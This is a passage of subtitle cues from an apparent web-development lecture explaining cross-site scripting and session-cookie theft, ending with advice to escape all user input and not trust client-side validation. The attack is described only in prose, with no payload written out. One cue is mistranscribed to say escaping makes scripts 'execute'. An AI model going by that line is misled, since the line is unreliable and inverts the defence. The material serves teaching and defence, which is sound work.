Exactly, someone's cookie value.

2061
01:29:41,246 --> 01:29:43,256
Maybe it's Facebook, maybe
it's Gmail, maybe it's Bank

2062
01:29:43,256 --> 01:29:46,896
of America, something and now he
can presumably take that value

2063
01:29:46,896 --> 01:29:49,626
from his logs and use a
special program that he wrote

2064
01:29:49,626 --> 01:29:53,206
or downloaded and pretend
that that is his own cookie,

2065
01:29:53,406 --> 01:29:55,676
and now he's logged in
as this random person.

2066
01:29:56,196 --> 01:29:59,966
So in the end of the story
-- by the end of the story,

2067
01:30:00,326 --> 01:30:05,046
vulnerable.com has to be flawed,

2068
01:30:05,046 --> 01:30:07,446
it has to be vulnerable
by doing what?

2069
01:30:07,656 --> 01:30:10,256
So step two describes
it, but what do I mean

2070
01:30:10,256 --> 01:30:11,146
by it makes the mistake

2071
01:30:11,146 --> 01:30:13,156
of writing the value
of foo to its body?

2072
01:30:13,686 --> 01:30:13,786
Jack?

2073
01:30:15,516 --> 01:30:21,566
[ Inaudible Speaker ]

2074
01:30:22,066 --> 01:30:22,736
Exactly. Right?

2075
01:30:22,736 --> 01:30:25,886
So just as we did this silly
example a couple lectures ago

2076
01:30:25,886 --> 01:30:28,636
where I tricked the browser
into triggering an alert

2077
01:30:28,636 --> 01:30:30,916
that said hi, or
annoy me, or whatnot,

2078
01:30:31,616 --> 01:30:35,066
if there's a similar form
on vulnerable.com's website,

2079
01:30:35,356 --> 01:30:39,056
and I have tricked it into
pre-populating that form field

2080
01:30:39,676 --> 01:30:41,526
with in this case a script tag,

2081
01:30:41,646 --> 01:30:44,646
because that's what the bad
guy has tried to trick me

2082
01:30:44,646 --> 01:30:47,246
into providing as input,
and you did not only --

2083
01:30:47,436 --> 01:30:51,076
you only called print or echo
or use the equals sign operator,

2084
01:30:51,216 --> 01:30:52,726
you did not use what function?

2085
01:30:53,516 --> 01:30:55,546
[ Inaudible Speaker ]

2086
01:30:56,046 --> 01:30:59,266
Yeah, HTML special charge, which
escapes things with ampersands

2087
01:30:59,326 --> 01:31:02,426
and entities and the like
and makes them execute.

2088
01:31:02,606 --> 01:31:08,236
Well, badguy.com is going to
get your cookies in this case.

2089
01:31:08,446 --> 01:31:10,816
So what's the key takeaway here?

2090
01:31:10,816 --> 01:31:13,586
How do you protect
yourself against XSS?

2091
01:31:15,046 --> 01:31:15,236
Jack?

2092
01:31:15,236 --> 01:31:15,976
[ Inaudible Speaker ]

2093
01:31:15,976 --> 01:31:19,416
It really is as simple
as that, right?

2094
01:31:19,416 --> 01:31:21,376
Like, the alternative
is, don't click links,

2095
01:31:21,376 --> 01:31:22,906
but that's not going to
happen, users are going to that.

2096
01:31:22,906 --> 01:31:24,046
And it doesn't even
matter if they click,

2097
01:31:24,046 --> 01:31:26,136
because they can just use
an image tag to trick them.

2098
01:31:26,606 --> 01:31:27,776
Don't trust user input.

2099
01:31:27,776 --> 01:31:29,146
So that's a given, all right.

2100
01:31:29,196 --> 01:31:32,166
So a key theme here with
these latest attacks is,

2101
01:31:32,346 --> 01:31:35,786
you should never trust that
what the user is typing is going

2102
01:31:35,786 --> 01:31:39,656
to be valid, and you should
certainly encode it or escape it

2103
01:31:39,796 --> 01:31:42,466
so that you're warding off
these kinds of attacks.

2104
01:31:43,626 --> 01:31:44,556
All right, because what if --

2105
01:31:44,556 --> 01:31:46,386
and again, just to
emphasize one lesson

2106
01:31:46,386 --> 01:31:47,936
from our JavaScript discussions,

2107
01:31:48,606 --> 01:31:50,956
but this is why we
have form validation.

2108
01:31:50,956 --> 01:31:53,606
Why don't I just check that what
the user is submitting doesn't

2109
01:31:53,606 --> 01:31:55,886
contain the open bracket
or the script tag?

2110
01:31:57,326 --> 01:32:01,796
Why do I also still need to
encode or escape all user input?

2111
01:32:02,516 --> 01:32:13,546
[ Inaudible Speaker ]

2112
01:32:14,046 --> 01:32:14,776
Exactly.

2113
01:32:15,516 --> 01:32:21,196
[ Inaudible Speaker ]

2114
01:32:21,696 --> 01:32:24,866
Exactly. [Inaudible] validation
not sufficient because it can be

2115
01:32:24,866 --> 01:32:26,986
so easily disabled,
as I did the other day

2116
01:32:26,986 --> 01:32:28,866
by just clicking something,
you can turn it off

2117
01:32:28,866 --> 01:32:31,616
for your entire browser by
some preferences menu, usually,

2118
01:32:31,936 --> 01:32:34,346
or can just write your own
software at a terminal window

2119
01:32:34,346 --> 01:32:35,896
that pretends to be a browser

2120
01:32:36,056 --> 01:32:38,766
and therefore doesn't have any
JavaScript support whatsoever,

2121
01:32:38,766 --> 01:32:40,896
it just makes HTTP requests.

2122
01:32:41,866 --> 01:32:46,696
So there's a whole number of
attacks that we explored today,

2123
01:32:46,696 --> 01:32:49,896
and we've talked about things
here and there over time.

2124
01:32:50,186 --> 01:32:52,246
But ultimately the
lesson really should be,

2125
01:32:52,326 --> 01:32:57,386
never trust the users input,
and also consider the fact

2126
01:32:57,506 --> 01:33:00,406
that at least one of your users
is going to be some adversary

2127
01:33:00,406 --> 01:33:02,396
or just a little bit
curious as to your site works

2128
01:33:02,656 --> 01:33:05,276
and you should never just expect
that, you know, users are going

2129
01:33:05,276 --> 01:33:07,196
to behave in the
manner you intend.

2130
01:33:08,356 --> 01:33:09,036
So what remains?

2131
01:33:09,036 --> 01:33:11,076
Thus far we've been using
[inaudible] appliance,

2132
01:33:11,206 --> 01:33:14,476
you've been having probably
one user bang on your website,

2133
01:33:14,476 --> 01:33:16,276
or two, including
your teacher fellow.

2134
01:33:16,506 --> 01:33:18,906
But on Monday what we'll
discuss is scalability

2135
01:33:18,906 --> 01:33:20,196
and how you can actually
take a website

2136
01:33:20,196 --> 01:33:22,746
and not just tolerate dozens
or hundreds or even thousands

2137
01:33:22,746 --> 01:33:24,356
of users, but maybe
tens of thousands.

2138
01:33:24,356 --> 01:33:26,616
And what kinds of design
decisions you can make even

2139
01:33:26,616 --> 01:33:28,506
for the simplest
of projects so that

2140
01:33:28,506 --> 01:33:30,376
if you do have some
happy coincidence

2141
01:33:30,376 --> 01:33:31,806
of becoming popular overnight,

2142
01:33:31,806 --> 01:33:34,806
as some websites these
days have become,

2143
01:33:34,806 --> 01:33:36,866
you at least have designed
things in such a way

2144
01:33:36,866 --> 01:33:39,536
that you can scale your
website out without having

2145
01:33:39,536 --> 01:33:41,116
to throw a lot of
money at it, certainly,

2146
01:33:41,346 --> 01:33:43,856
and also without having to
rewrite all of your code.

2147
01:33:43,856 --> 01:33:45,636
There's a number of decisions
you'll be able to make

2148
01:33:45,636 --> 01:33:48,826
up front that, if you are so
lucky as to have a problem

2149
01:33:48,826 --> 01:33:51,356
of scalability, you'll
be able to adapt to it.

2150
01:33:51,886 --> 01:33:53,086
Why don't we adjourn here.

2151
01:33:53,086 --> 01:33:54,546
I'll stick around for
one on one questions,

2152
01:33:54,546 --> 01:33:56,026
otherwise we have
Section coming up,

2153
01:33:56,306 --> 01:33:57,936
and I'll see you guys on Monday.

